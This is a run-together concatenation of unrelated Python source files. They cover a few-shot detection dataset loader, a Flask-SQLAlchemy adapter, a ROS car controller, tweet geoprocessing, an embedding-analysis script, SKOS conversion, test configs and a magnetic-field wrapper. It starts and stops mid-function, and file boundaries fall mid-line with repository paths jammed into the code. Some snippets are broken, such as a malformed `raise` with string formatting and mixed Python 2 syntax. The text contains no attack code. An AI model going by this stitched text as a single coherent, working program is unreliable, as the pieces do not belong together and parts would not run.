merge_data_dict[data_info['id']] = data_info else: ann_a = merge_data_dict[data_info['id']]['ann'] ann_b = data_info['ann'] merge_dat_info = { 'bboxes': np.concatenate((ann_a['bboxes'], ann_b['bboxes'])), 'labels': np.concatenate((ann_a['labels'], ann_b['labels'])), } # merge `bboxes_ignore` if ann_a.get('bboxes_ignore', None) is not None: if not (ann_a['bboxes_ignore'] == ann_b['bboxes_ignore']).all(): merge_dat_info['bboxes_ignore'] = \ np.concatenate((ann_a['bboxes_ignore'], ann_b['bboxes_ignore'])) merge_dat_info['labels_ignore'] = \ np.concatenate((ann_a['labels_ignore'], ann_b['labels_ignore'])) merge_data_dict[ data_info['id']]['ann'] = merge_dat_info self.data_infos = [ merge_data_dict[key] for key in merge_data_dict.keys() ] # set group flag for the sampler self._set_group_flag() assert pipeline is None or multi_pipelines is None, \ f'{self.dataset_name} : can not assign pipeline ' \ f'or multi_pipelines simultaneously' # processing pipeline if there are two pipeline the # pipeline will be determined by key name of query or support if multi_pipelines is not None: assert isinstance(multi_pipelines, dict), \ f'{self.dataset_name} : multi_pipelines is type of dict' self.multi_pipelines = {} for key in multi_pipelines.keys(): self.multi_pipelines[key] = Compose(multi_pipelines[key]) elif pipeline is not None: assert isinstance(pipeline, list), \ f'{self.dataset_name} : pipeline is type of list' self.pipeline = Compose(pipeline) else: raise ValueError('missing pipeline or multi_pipelines') # show dataset annotation usage logger = get_root_logger() logger.info(self.__repr__()) def 
ann_cfg_parser(self, ann_cfg: List[Dict]) -> List[Dict]: """Parse annotation config to annotation information. Args: ann_cfg (list[dict]): Annotation config support two type of config. - 'ann_file': loading annotation from common ann_file of dataset. example: dict(type='ann_file', ann_file='path/to/ann_file', ann_classes=['dog', 'cat']) - 'saved_dataset': loading annotation from saved dataset. example:dict(type='saved_dataset', ann_file='path/to/ann_file') Returns: list[dict]: Annotation information. """ # join paths if data_root is specified if self.data_root is not None: for i in range(len(ann_cfg)): if not osp.isabs(ann_cfg[i]['ann_file']): ann_cfg[i]['ann_file'] = \ osp.join(self.data_root, ann_cfg[i]['ann_file']) # ann_cfg must be list assert isinstance(ann_cfg, list), \ f'{self.dataset_name} : ann_cfg should be type of list.' # check type of ann_cfg for ann_cfg_ in ann_cfg: assert isinstance(ann_cfg_, dict), \ f'{self.dataset_name} : ann_cfg should be list of dict.' assert ann_cfg_['type'] in ['ann_file', 'saved_dataset'], \ f'{self.dataset_name} : ann_cfg only support type of ' \ f'ann_file and saved_dataset' return self.load_annotations(ann_cfg) def get_ann_info(self, idx: int) -> Dict: """Get annotation by index. When override this function please make sure same annotations are used during the whole training. Args: idx (int): Index of data. Returns: dict: Annotation info of specified index. """ return copy.deepcopy(self.data_infos[idx]['ann']) def prepare_train_img(self, idx: int, pipeline_key: Optional[str] = None, gt_idx: Optional[List[int]] = None) -> Dict: """Get training data and annotations after pipeline. Args: idx (int): Index of data. pipeline_key (str): Name of pipeline gt_idx (list[int]): Index of used annotation. Returns: dict: Training data and annotation after pipeline with new keys \ introduced by pipeline. """ img_info = self.data_infos[idx] ann_info = self.get_ann_info(idx) # select annotation in `gt_idx` if gt_idx is not None: selected_ann_info = { 'bboxes': ann_info['bboxes'][gt_idx], 'labels': ann_info['labels'][gt_idx] } # keep pace with new annotations new_img_info = copy.deepcopy(img_info) new_img_info['ann'] = selected_ann_info results = dict(img_info=new_img_info, ann_info=selected_ann_info) # use all annotations else: results = dict(img_info=copy.deepcopy(img_info), ann_info=ann_info) if self.proposals is not None: results['proposals'] = self.proposals[idx] self.pre_pipeline(results) if pipeline_key is None: return self.pipeline(results) else: return self.multi_pipelines[pipeline_key](results) def _filter_annotations(self, data_infos: List[Dict], ann_shot_filter: Dict) -> List[Dict]: """Filter out extra annotations of specific class, while annotations of classes not in filter remain unchanged and the ignored annotations will be removed. Args: data_infos (list[dict]): Annotation infos. ann_shot_filter (dict): Specific which class and how many instances of each class to load from annotation file. For example: {'dog': 10, 'cat': 10, 'person': 5} Returns: list[dict]: Annotation infos where number of specified class shots less than or equal to predefined number. 
""" if ann_shot_filter is None: return data_infos # build instance indices of (img_id, gt_idx) filter_instances = {key: [] for key in ann_shot_filter.keys()} keep_instances_indices = [] for idx, data_info in enumerate(data_infos): ann = data_info['ann'] for i in range(ann['labels'].shape[0]): instance_class_name = self.CLASSES[ann['labels'][i]] # only filter instance from the filter class if instance_class_name in ann_shot_filter.keys(): filter_instances[instance_class_name].append((idx, i)) # skip the class not in the filter else: keep_instances_indices.append((idx, i)) # filter extra shots for class_name in ann_shot_filter.keys(): num_shots = ann_shot_filter[class_name] instance_indices = filter_instances[class_name] if num_shots == 0: continue # random sample from all instances if len(instance_indices) > num_shots: random_select = np.random.choice( len(instance_indices), num_shots, replace=False) keep_instances_indices += \ [instance_indices[i] for i in random_select] # number of available shots less than the predefined number, # which may cause the performance degradation else: # check the number of instance if len(instance_indices) < num_shots: warnings.warn(f'number of {class_name} instance is ' f'{len(instance_indices)} which is ' f'less than predefined shots {num_shots}.') keep_instances_indices += instance_indices # keep the selected annotations and remove the undesired annotations new_data_infos = [] for idx, data_info in enumerate(data_infos): selected_instance_indices = \ sorted(instance[1] for instance in keep_instances_indices if instance[0] == idx) if len(selected_instance_indices) == 0: continue ann = data_info['ann'] selected_ann = dict( bboxes=ann['bboxes'][selected_instance_indices], labels=ann['labels'][selected_instance_indices], ) new_data_infos.append( dict( id=data_info['id'], filename=data_info['filename'], width=data_info['width'], height=data_info['height'], ann=selected_ann)) return new_data_infos def _filter_bboxs(self, min_bbox_size: int) -> List[Dict]: new_data_infos = [] for data_info in self.data_infos: ann = data_info['ann'] keep_idx, ignore_idx = [], [] for i in range(ann['bboxes'].shape[0]): bbox = ann['bboxes'][i] w = bbox[2] - bbox[0] h = bbox[3] - bbox[1] # check bbox size if w < min_bbox_size or h < min_bbox_size: ignore_idx.append(i) else: keep_idx.append(i) # remove undesired bbox if len(ignore_idx) > 0: bboxes_ignore = ann.get('bboxes_ignore', np.zeros((0, 4))) labels_ignore = ann.get('labels_ignore', np.zeros((0, ))) new_bboxes_ignore = ann['bboxes'][ignore_idx] new_labels_ignore = ann['labels'][ignore_idx] bboxes_ignore = np.concatenate( (bboxes_ignore, new_bboxes_ignore)) labels_ignore = np.concatenate( (labels_ignore, new_labels_ignore)) data_info.update( ann=dict( bboxes=ann['bboxes'][keep_idx], labels=ann['labels'][keep_idx], bboxes_ignore=bboxes_ignore, labels_ignore=labels_ignore)) new_data_infos.append(data_info) return new_data_infos def _set_group_flag(self) -> None: """Set flag according to image aspect ratio. Images with aspect ratio greater than 1 will be set as group 1, otherwise group 0. In few shot setting, the limited number of images might cause some mini-batch always sample a certain number of images and thus not fully shuffle the data, which may degrade the performance. Therefore, all flags are simply set to 0. 
""" self.flag = np.zeros(len(self), dtype=np.uint8) def load_annotations_saved(self, ann_file: str) -> List[Dict]: """Load data_infos from saved json.""" with open(ann_file) as f: data_infos = json.load(f) # record the index of meta info meta_idx = None for i, data_info in enumerate(data_infos): # check the meta info CLASSES and img_prefix saved in json if 'CLASSES' in data_info.keys(): assert self.CLASSES == tuple(data_info['CLASSES']), \ f'{self.dataset_name} : class labels mismatch.' assert self.img_prefix == data_info['img_prefix'], \ f'{self.dataset_name} : image prefix mismatch.' meta_idx = i # skip the meta info continue # convert annotations from list into numpy array for k in data_info['ann']: assert isinstance(data_info['ann'][k], list) # load bboxes and bboxes_ignore if 'bboxes' in k: # bboxes_ignore can be empty if len(data_info['ann'][k]) == 0: data_info['ann'][k] = np.zeros((0, 4)) else: data_info['ann'][k] = \ np.array(data_info['ann'][k], dtype=np.float32) # load labels and labels_ignore elif 'labels' in k: # labels_ignore can be empty if len(data_info['ann'][k]) == 0: data_info['ann'][k] = np.zeros((0, )) else: data_info['ann'][k] = \ np.array(data_info['ann'][k], dtype=np.int64) else: raise KeyError(f'unsupported key {k} in ann field') # remove meta info if meta_idx is not None: data_infos.pop(meta_idx) return data_infos def save_data_infos(self, output_path: str) -> None: """Save data_infos into json.""" # numpy array will be saved as list in the json meta_info = [{'CLASSES': self.CLASSES, 'img_prefix': self.img_prefix}] with open(output_path, 'w', encoding='utf-8') as f: json.dump( meta_info + self.data_infos, f, ensure_ascii=False, indent=4, cls=NumpyEncoder) def __repr__(self) -> str: """Print the number of instances of each class.""" result = (f'\n{self.__class__.__name__} {self.dataset_name} ' f'with number of images {len(self)}, ' f'and instance counts: \n') if self.CLASSES is None: result += 'Category names are not provided. \n' return result instance_count = np.zeros(len(self.CLASSES) + 1).astype(int) # count the instance number in each image for idx in range(len(self)): label = self.get_ann_info(idx)['labels'] unique, counts = np.unique(label, return_counts=True) if len(unique) > 0: # add the occurrence number to each class instance_count[unique] += counts else: # background is the last index instance_count[-1] += 1 # create a table with category count table_data = [['category', 'count'] * 5] row_data = [] for cls, count in enumerate(instance_count): if cls < len(self.CLASSES): row_data += [f'{cls} [{self.CLASSES[cls]}]', f'{count}'] else: # add the background number row_data += ['-1 background', f'{count}'] if len(row_data) == 10: table_data.append(row_data) row_data = [] if len(row_data) != 0: table_data.append(row_data) table = AsciiTable(table_data) result += table.table return result 1-10 # encoding: utf-8 """ Flask-SQLAlchemy adapter ------------------------ """ import sqlite3 from flask_sqlalchemy import SQLAlchemy as BaseSQLAlchemy from sqlalchemy import engine def set_sqlite_pragma(dbapi_connection, connection_record): """ SQLite supports FOREIGN KEY syntax when emitting CREATE statements for tables, however by default these constraints have no effect on the operation of the table. 
http://docs.sqlalchemy.org/en/latest/dialects/sqlite.html#foreign-key-support """ if not isinstance(dbapi_connection, sqlite3.Connection): return cursor = dbapi_connection.cursor() cursor.execute("PRAGMA foreign_keys=ON") cursor.close() class AlembicDatabaseMigrationConfig(object): """ Helper config holder that provides missing functions of Flask-Alembic package since we use custom invoke tasks instead. """ def __init__(self, database, directory='migrations', **kwargs): self.db = database self.directory = directory self.configure_args = kwargs class SQLAlchemy(BaseSQLAlchemy): """ Customized Flask-SQLAlchemy adapter with enabled autocommit, constraints auto-naming conventions and ForeignKey constraints for SQLite. """ # def __init__(self, *args, **kwargs): # if 'session_options' not in kwargs: # kwargs['session_options'] = {} # kwargs['session_options']['autocommit'] = True # # Configure Constraint Naming Conventions: # # http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions # kwargs['metadata'] = MetaData( # naming_convention={ # 'pk': 'pk_%(table_name)s', # 'fk': 'fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s', # 'ix': 'ix_%(table_name)s_%(column_0_name)s', # 'uq': 'uq_%(table_name)s_%(column_0_name)s', # 'ck': 'ck_%(table_name)s_%(constraint_name)s', # } # ) # super(SQLAlchemy, self).__init__(*args, **kwargs) def init_app(self, app): super(SQLAlchemy, self).init_app(app) database_uri = app.config['SQLALCHEMY_DATABASE_URI'] assert database_uri, "SQLALCHEMY_DATABASE_URI must be configured!" if database_uri.startswith('sqlite:'): self.event.listens_for(engine.Engine, "connect")(set_sqlite_pragma) app.extensions['migrate'] = AlembicDatabaseMigrationConfig(self, compare_type=True) sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/_check.py # pylint: disable=too-many-lines # ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ import re def is_language_api(api_version): """Language API is date-based """ return re.search(r'\d{4}-\d{2}-\d{2}', api_version) def string_index_type_compatibility(string_index_type): """Language API changed this string_index_type option to plural. 
Convert singular to plural for language API """ if string_index_type == "TextElement_v8": return "TextElements_v8" return string_index_type import rospy from pid import PID from yaw_controller import YawController from lowpass import LowPassFilter GAS_DENSITY = 2.858 ONE_MPH = 0.44704 # Nalini - added 9/1/2018 class Controller(object): def __init__(self, *args, **kwargs): # TODO: Implement self.wheel_base = kwargs['wheel_base'] self.steer_ratio = kwargs['steer_ratio'] self.fuel_capacity = kwargs['fuel_capacity'] self.min_speed = 0 self.max_lat_accel = kwargs['max_lat_accel'] self.max_steer_angle = kwargs['max_steer_angle'] self.decel_limit = kwargs['decel_limit'] self.accel_limit = kwargs['accel_limit'] self.wheel_radius = kwargs['wheel_radius'] Kp = 1 Ki = 0 Kd = 0.05 self.pid_controller = PID(Kp, Ki, Kd, mn = self.decel_limit, mx = self.accel_limit) self.yaw_controller = YawController(self.wheel_base, self.steer_ratio, self.min_speed, self.max_lat_accel, self.max_steer_angle) tau = 0.5 ts = .02 self.vel_lpf = LowPassFilter(tau, ts) self.vehicle_mass = kwargs['vehicle_mass'] + kwargs['fuel_capacity'] * GAS_DENSITY self.brake_deadband = kwargs['brake_deadband'] self.last_time = rospy.get_time() def control(self, current_vel, dbw_enabled, linear_vel, angular_vel): # TODO: Change the arg, kwarg list to suit your needs # Return throttle, brake, steer if not dbw_enabled: self.pid_controller.reset() return 0., 0., 0. current_vel = self.vel_lpf.filt(current_vel) steering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel) vel_error = linear_vel - current_vel self.last_vel = current_vel current_time = rospy.get_time() sample_time = current_time - self.last_time self.last_time = current_time throttle = self.pid_controller.step(vel_error, sample_time) brake = 0 if linear_vel == 0 and current_vel < 0.1: throttle = 0 brake = 400 # car stops at light elif throttle < .1 and vel_error < 0: throttle = 0 decel = max(vel_error, self.decel_limit) brake = abs(decel)*self.vehicle_mass*self.wheel_radius return throttle, brake, steering src/func/geo_utils.py import fiona from shapely.geometry import Point, Polygon, MultiPolygon import geopandas as geopd import json from pyproj import Proj, transform def get_shape(geoJsonFileName): print(geoJsonFileName) # geopandas struggels with PosixPaths return geopd.read_file(str(geoJsonFileName)) def loadGeneric(shapefile, key="PUBLIC_NAM", city_key="", city_id=""): """Load any shapefile. 
Ex usage: park_polygon_list,park_name_list = loadGeneric("shapefiles/nps_boundary.shp",key="UNIT_NAME"):""" c = fiona.open(shapefile, 'r') polygonList = [] nameList = [] polygonCount = 0 multiPolygonCount = 0 print(city_key, city_id) for city in list(c): if city['properties'][city_key] == city_id: nameList.append(city['properties'][key]) try: if city['geometry']['type'] == 'Polygon': polygonCount += 1 coordinates = city['geometry']['coordinates'] polygonList.append(Polygon(coordinates[0])) elif city['geometry']['type'] == 'MultiPolygon': multiPolygonCount += 1 coordinates = city['geometry']['coordinates'] coordinates_w_holes = [(tuple(c[0]), ()) if len( c) == 1 else (tuple(c[0]), (c[1:])) for c in coordinates] polygonList.append(MultiPolygon(coordinates_w_holes)) else: raise('unknown geometry ' % city['geometry']['type']) except TypeError: pass print('done loading') return polygonList, nameList def cityID(polygonList, pt): for i, city in enumerate(polygonList): if city.contains(pt): return i return -1 def merge_tweets(path): """ Takes a directory (path object) and joins the files into single json """ tweet_files = [e for e in path.iterdir() if e.is_file()] all_tweets = [] for file_path in tweet_files: with open(str(file_path)) as f: day_of_tweets = json.load(f) all_tweets.extend(day_of_tweets) return(all_tweets) def reproj_tweet(tweet): tweet_crs = Proj({'proj': 'longlat', 'ellps': 'WGS84', 'datum': 'WGS84'}) tpl_crs = Proj({'proj': 'aea', 'lat_1': 20, 'lat_2': 60, 'lat_0': 40, 'lon_0': -96, 'x_0': 0, 'y_0': 0, 'datum': 'NAD83', 'units': 'm', 'no_defs': True, 'wktext': True}) lon = tweet['geo']['coordinates'][0] lat = tweet['geo']['coordinates'][1] lon, lat = transform(tweet_crs, tpl_crs, lon, lat) return [lon, lat] def get_park_tweets(tweets, pList, nList): """Takes a list of tweets as processed from the mongodb. Returns tweets with coordinates originating in the pList (e.g., park polygons loaded from a shapefile """ park_tweets = [] control_tweets = [] current_tweet = {} for tweet in tweets: coords = reproj_tweet(tweet) # tweet['geo']['coordinates'] # coords = [coords[1], coords[0]] park_id = cityID(pList, Point(Point(coords))) tweet['park_id'] = park_id if park_id >= 0: tweet['park_name'] = nList[park_id] print("found park tweet") park_tweets.append(tweet) control_tweets.append(current_tweet) else: current_tweet = tweet return park_tweets, control_tweets src/refinement/__init__.py from .config import RefinementConfig from .knowledge import KnowledgeProcessor''' BINARY TREE LEVEL ORDER TRAVERSAL Given a binary tree, return the level order traversal of its nodes' values. (ie, from left to right, level by level). 
3 / \ 9 20 ----> [[3], [9, 20], [15, 7]] / \ 15 7 ''' def levelOrder(root: TreeNode) -> List[List[int]]: if not root: return [] ans, level = [], [root] while level: ans.append([l.val for l in level]) # ---- Add ListNode vals from previous levels new = [] for n in level: # ---- Add children of current level ListNodes to next level if n.left: new.append(n.left) if n.right: new.append(n.right) if level is not new: # ---- Exit if we reach leaf nodes level = new else: level = [] return ans class LivecliError(Exception): """Any error caused by Livecli will be caught with this exception.""" class PluginError(LivecliError): """Plugin related error.""" class NoStreamsError(LivecliError): def __init__(self, url): self.url = url err = "No streams found on this URL: {0}".format(url) Exception.__init__(self, err) class NoPluginError(PluginError): """No relevant plugin has been loaded.""" class StreamError(LivecliError): """Stream related error.""" __all__ = ["LivecliError", "PluginError", "NoPluginError", "NoStreamsError", "StreamError"] import sys sys.path.append('/gpfs/projects/bsc28/tiramisu_semantic_transfer/') import numpy as np from tiramisu.tensorflow.core.backend import read_embeddings embeddings = ['1284246'] labels = ['dog'] for emb,lab in zip(embeddings,labels): (results, img_paths, labels, layers_dict) = read_embeddings(path_prefix="/gpfs/projects/bsc28/tiramisu_semantic_transfer/embeddings/1284246/train/embeddings_0") print '-----------------' print 'Going in with',emb,' ',lab dmp = np.copy(results == 1) #Currently exploring only the positives #dmn = np.copy(results == -1) #dm = np.concatenate((dmp , dmn), axis=1) #Get subset by synset pos_emb = dmp[[x==lab for x in labels]] neg_emb = dmp[[x!=lab for x in labels]] print 'Size of '+lab+' embedding',pos_emb.shape print 'Size of complementary embedding',neg_emb.shape #Compute distribution per feature. pos_feature_counts = [] neg_feature_counts = [] pos_full_hits = 0 pos_full_misses = 0 neg_full_hits = 0 neg_full_misses = 0 pos_features_maj_ones = [] neg_features_maj_ones = [] counter = 0 for p,n in zip(pos_emb.T,neg_emb.T): p_unique, p_counts = np.unique(p, return_counts=True) n_unique, n_counts = np.unique(n, return_counts=True) #If there is ony one value if len(p_counts)==1: #its a full hit! if p_unique[0] == True: pos_full_hits+=1 pos_feature_counts.append(p_counts) #Full miss else: pos_full_misses+=1 pos_feature_counts.append(0) #if there are two values, get the second which corresponds to True else: if p_counts[1]>p_counts[0]: pos_features_maj_ones.append(counter) try: pos_feature_counts.append(p_counts[1]) except IndexError: print 'An error occurred when processing counts',p_counts #If there is ony one value if len(n_counts)==1: #its a full hit! 
if n_unique[0] == True: neg_full_hits+=1 neg_feature_counts.append(n_counts) #Full miss else: neg_full_misses+=1 neg_feature_counts.append(0) #if there are two values, get the second which corresponds to True else: if n_counts[1]>n_counts[0]: neg_features_maj_ones.append(counter) try: neg_feature_counts.append(n_counts[1]) except IndexError: print 'An error occurred when processing counts',n_counts counter+=1 print lab+' Positive full hits:',pos_full_hits, ' full misses:',pos_full_misses print lab+' Negative full hits:',neg_full_hits, ' and full misses:',neg_full_misses #print 'Features with majority of ones:',features_maj_ones #Store #np.save(open('liv_embedding_feature_counts.npy','w'),feature_counts) #Plot import matplotlib matplotlib.use('pdf') import matplotlib.mlab as mlab import matplotlib.pyplot as plt #Get only the positive cases. its simetrical to 50K n, bins, patches = plt.hist(pos_feature_counts, 500, facecolor='green', alpha=0.75) plt.axvline(pos_emb.shape[0]/2, color='k', linestyle='solid') plt.savefig('positive_features_distributions_'+lab+'.pdf') plt.clf() n, bins, patches = plt.hist(neg_feature_counts, 500, facecolor='green', alpha=0.75) plt.axvline(neg_emb.shape[0]/2, color='k', linestyle='solid') plt.savefig('negative_features_distributions_'+lab+'.pdf') plt.clf() pos_f = open(lab+'_pos_features_maj_ones.txt','w') for item in pos_features_maj_ones: pos_f.write("%s\n" % item) pos_f.close() neg_f = open(lab+'_neg_features_maj_ones.txt','w') for item in neg_features_maj_ones: neg_f.write("%s\n" % item) neg_f.close() ###Load most frequent feature values separately #most_freq_vals_dead = [] #most_freq_vals_live = [] #for d,a in zip(dead_emb.T,live_emb.T): # most_freq_vals_dead.append(np.argmax(np.bincount(d))) # most_freq_vals_live.append(np.argmax(np.bincount(a))) #print 'For dog hyponyms, the number of features with more frequent 1s are:',np.bincount(most_freq_vals_dead)[1] #print 'For nodog hyponyms, the number of features with more frequent 1s are:',np.bincount(most_freq_vals_live)[1] # ##Get indices of features with 1 #dead_indices = np.argwhere(most_freq_vals_dead) #live_indices = np.argwhere(most_freq_vals_live) #print live_indices ##Get the count by layer #dead_layer_counts = {} #live_layer_counts = {} #for d in dead_indices: # for k,v in layers_dict.iteritems(): # if v[0] < d < v[1]: # if k in dead_layer_counts.keys(): # dead_layer_counts[k]+=1 # else: # dead_layer_counts[k]=1 #for l in live_indices: # for k,v in layers_dict.iteritems(): # if v[0] < l < v[1]: # if k in live_layer_counts.keys(): # live_layer_counts[k]+=1 # else: # live_layer_counts[k]=1 #print live_layer_counts #NEXT: sort layers. find subsets for hyponym embedding extraction (vs mammal?). look for relations between features of same synset (weights between layers?) 
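

# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original script above): the per-feature
# counting that the loops over pos_emb.T / neg_emb.T perform, condensed into
# vectorised numpy and run on a tiny synthetic boolean matrix. All names and
# data below are invented for illustration only.
import numpy as np


def count_feature_hits(emb):
    """For a boolean matrix of shape (n_samples, n_features), return the
    per-feature count of True values, the number of features that are all
    True ("full hits"), all False ("full misses"), and the indices of
    features where True is the majority."""
    counts = emb.sum(axis=0)
    full_hits = int(np.sum(counts == emb.shape[0]))
    full_misses = int(np.sum(counts == 0))
    maj_ones = np.where(counts > emb.shape[0] / 2.0)[0]
    return counts, full_hits, full_misses, maj_ones


if __name__ == '__main__':
    rng = np.random.default_rng(0)
    toy_emb = rng.random((8, 5)) > 0.5  # stands in for pos_emb / neg_emb
    print(count_feature_hits(toy_emb))
# ---------------------------------------------------------------------------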
import pytest import os import re import ssg.build_cpe import ssg.xml ET = ssg.xml.ElementTree def test_extract_element(): obj = """ This That """ tree = ET.fromstring(obj) assert ssg.build_cpe.extract_subelement(tree, 'id') == 'test' assert ssg.build_cpe.extract_subelement(tree, 'random') == 'not-me' assert ssg.build_cpe.extract_subelement(tree, 'missing') is None assert ssg.build_cpe.extract_subelement(tree, 'subelement') is None def test_extract_env_obj(): local_var_text = """ elements """ local_var = ET.fromstring(local_var_text) local_var_missing_text = """ here """ local_var_missing = ET.fromstring(local_var_missing_text) objects_text = """ something magical here """ objects = ET.fromstring(objects_text) present = ssg.build_cpe.extract_env_obj(objects, local_var) assert present is not None assert present.text == 'magical' missing = ssg.build_cpe.extract_env_obj(objects, local_var_missing) assert missing is None def test_extract_referred_nodes(): tree_with_refs_text = """ """ tree_with_refs = ET.fromstring(tree_with_refs_text) tree_with_ids_text = """ Brno Boston Source Code Fedora """ tree_with_ids = ET.fromstring(tree_with_ids_text) results = ssg.build_cpe.extract_referred_nodes(tree_with_refs, tree_with_ids, 'object_ref') assert len(results) == 1 assert results[0].text == 'Source Code' #!/usr/bin/env python from rdflib import Graph, Namespace, URIRef, Literal, RDF import csv import sys import re if len(sys.argv) != 4: print >>sys.stderr, "Usage: %s " % sys.argv[0] sys.exit(1) classes_file = sys.argv[1] glossary_file = sys.argv[2] metadata_file = sys.argv[3] DC = Namespace("http://purl.org/dc/elements/1.1/") GFDC = Namespace("http://urn.fi/URN:NBN:fi:au:gfdc:") SKOS = Namespace("http://www.w3.org/2004/02/skos/core#") # map 3-letter ISO 639-2 language codes to 2-letter 639-1 codes used in RDF LANGMAP = { 'eng': 'en', 'fin': 'fi', 'swe': 'sv', 'ger': 'de', 'fre': 'fr', 'slv': 'sl' } g = Graph() g.namespace_manager.bind('dc', DC) g.namespace_manager.bind('skos', SKOS) g.namespace_manager.bind('gfdc', GFDC) def class_uri(notation): return GFDC['C' + notation.replace(' ','')] def concept_uri(conceptid): return GFDC['G%04d' % int(conceptid)] def cleanup_note(note): note = note.strip() if note.startswith('[') or note.startswith('('): note = note[1:] if note.endswith(']') or note.endswith(')'): note = note[:-1] return note.strip() def add_class(notation, labels, includingNotes, scopeNotes, BT, seeAlsos): uri = class_uri(notation) g.add((uri, RDF.type, SKOS.Concept)) g.add((uri, RDF.type, GFDC.Class)) g.add((uri, SKOS.notation, Literal(notation))) for lang3, lang2 in LANGMAP.items(): if labels[lang3] != '' and labels[lang3] != 'MISSING_VALUE': g.add((uri, SKOS.prefLabel, Literal(labels[lang3], lang2))) if includingNotes[lang3] != '': g.add((uri, SKOS.scopeNote, Literal(cleanup_note(includingNotes[lang3]), lang2))) if scopeNotes[lang3] != '': g.add((uri, SKOS.scopeNote, Literal(cleanup_note(scopeNotes[lang3]), lang2))) for seeAlso in seeAlsos: if ' ' in seeAlso: print >>sys.stderr, "Skipping bad seeAlso value '%s'" % seeAlso continue if seeAlso == '': continue other = class_uri(seeAlso) g.add((uri, SKOS.related, other)) g.add((other, SKOS.related, uri)) if BT != '': g.add((uri, SKOS.broader, class_uri(BT))) g.add((class_uri(BT), SKOS.narrower, uri)) else: g.add((uri, SKOS.topConceptOf, GFDC[''])) g.add((GFDC[''], SKOS.hasTopConcept, uri)) g.add((uri, SKOS.inScheme, GFDC[''])) def add_concept(conceptid, clnum, labels, altLabels, hiddenLabels): uri = concept_uri(conceptid) g.add((uri, RDF.type, 
SKOS.Concept)) g.add((uri, RDF.type, GFDC.GlossaryConcept)) for lang, label in labels.items(): if labels[lang] != '': g.add((uri, SKOS.prefLabel, Literal(labels[lang], lang))) for lang, altlabels in altLabels.items(): for altlabel in altlabels: if altlabel != '': g.add((uri, SKOS.altLabel, Literal(altlabel, lang))) for lang, hiddenlabels in hiddenLabels.items(): for hiddenlabel in hiddenlabels: if hiddenlabel != '': g.add((uri, SKOS.hiddenLabel, Literal(hiddenlabel, lang))) # link to class cluri = class_uri(clnum) g.add((uri, SKOS.relatedMatch, cluri)) g.add((cluri, SKOS.relatedMatch, uri)) g.add((uri, SKOS.inScheme, GFDC['G'])) def add_metadata(field, values): prefix, ln = field.split(':') namespaces = dict(g.namespace_manager.namespaces()) ns = namespaces[prefix] fielduri = URIRef(ns + ln) for lang3, lang2 in LANGMAP.items(): if values[lang3] != '': for val in values[lang3].splitlines(): if val == '': continue g.add((GFDC[''], fielduri, Literal(val, lang2))) with open(classes_file, 'rb') as cf: reader = csv.DictReader(cf) for row in reader: labels = {} includingNotes = {} scopeNotes = {} BT = row['BT'] seeAlsos = row['seeAlso'].split('|') for lang in LANGMAP.keys(): labels[lang] = row['prefLabel-%s' % lang].strip() includingNotes[lang] = row['includingNote-%s' % lang].strip() scopeNotes[lang] = row['scopeNote-%s' % lang].strip() add_class(row['fdcNumber'].strip(), labels, includingNotes, scopeNotes, BT, seeAlsos) with open(glossary_file, 'rb') as gf: reader = csv.DictReader(gf) for row in reader: values = {} altLabels = {} hiddenLabels = {} for lang in LANGMAP.values(): values[lang] = row['indexTerm-%s' % lang].strip() altLabels[lang] = row['altLabel-%s' % lang].strip().split('|') hiddenLabels[lang] = row['hiddenLabel-%s' % lang].strip().split('|') add_concept(row['conceptId'].strip(), row['fdcNumber'].strip(), values, altLabels, hiddenLabels) with open(metadata_file, 'rb') as mf: reader = csv.DictReader(mf) for row in reader: values = {} for lang in LANGMAP.keys(): values[lang] = row['Value-%s' % lang].strip() add_metadata(row['Field'].strip(), values) # enrich scope notes with hyperlinks def concept_link(match): code = match.group(0) uri = class_uri(code) if (uri, RDF.type, SKOS.Concept) in g: # concept exists - make it a hyperlink return '
    %s' % (uri, code) else: # no such concept, use just a plain code return code for conc,note in g.subject_objects(SKOS.scopeNote): newnote = re.sub('\d+(\.\d+)*(/\.\d+)?', concept_link, note) if newnote != unicode(note): g.remove((conc, SKOS.scopeNote, note)) g.add((conc, SKOS.scopeNote, Literal(newnote, note.language))) g.serialize(destination=sys.stdout, format='turtle') glasser/integrations-coreaerospike/tests/common.py # (C) Datadog, Inc. 2019 # All rights reserved # Licensed under a 3-clause BSD style license (see LICENSE) import os from datadog_checks.dev import get_docker_hostname HERE = os.path.dirname(os.path.abspath(__file__)) COMPOSE_FILE = os.path.join(HERE, 'docker', 'docker-compose.yaml') HOST = get_docker_hostname() PORT = 3000 INSTANCE = { 'host': HOST, 'port': PORT, 'metrics': ['cluster_size', 'batch_error'], 'namespace_metrics': [ 'objects', 'hwm_breached', 'client_write_error', 'client_write_success', 'objects', 'tombstones', 'stop_writes_count', 'truncate_lut', 'memory_data_bytes', ], 'namespaces': ['test'], 'tags': ['tag:value'], } import numpy as np from ._CFunctions import _CInternalField,_CInternalFieldDeg def Field(p0,p1,p2,MaxDeg=None): ''' Return the internal magnetic field vector(s). Check the model config using JupiterMag.Internal.Config() to see whether Cartesian or polar coordinates are used for input/output and to set the model. Inputs ====== p0 : float Array/scalar containing x or r right-handed System III coordinate p1 : float Array/scalar containing y or theta right-handed System III coordinate p2 : float Array/scalar containing z or phi right-handed System III coordinate MaxDeg : None|int Maximum model degree to use. If None then the default value (model dependant) will be used. Returns ======= B0 : float Either Bx or Br in nT B1 : float Either By or Btheta in nT B2 : float Either Bz or Bphi in nT ''' #make sure that the inputs are the correct type if (hasattr(p0,'__iter__') == False): _p0 = np.array([p0]).astype('float64') else: _p0 = np.array(p0).astype('float64') if (hasattr(p1,'__iter__') == False): _p1 = np.array([p1]).astype('float64') else: _p1 = np.array(p1).astype('float64') if (hasattr(p2,'__iter__') == False): _p2 = np.array([p2]).astype('float64') else: _p2 = np.array(p2).astype('float64') _l = np.int32(np.size(_p0)) _B0 = np.zeros(_l,dtype='float64') _B1 = np.zeros(_l,dtype='float64') _B2 = np.zeros(_l,dtype='float64') #call the model if MaxDeg is None: _CInternalField(_l,_p0,_p1,_p2,_B0,_B1,_B2) else: _MaxDeg = np.int32(MaxDeg) 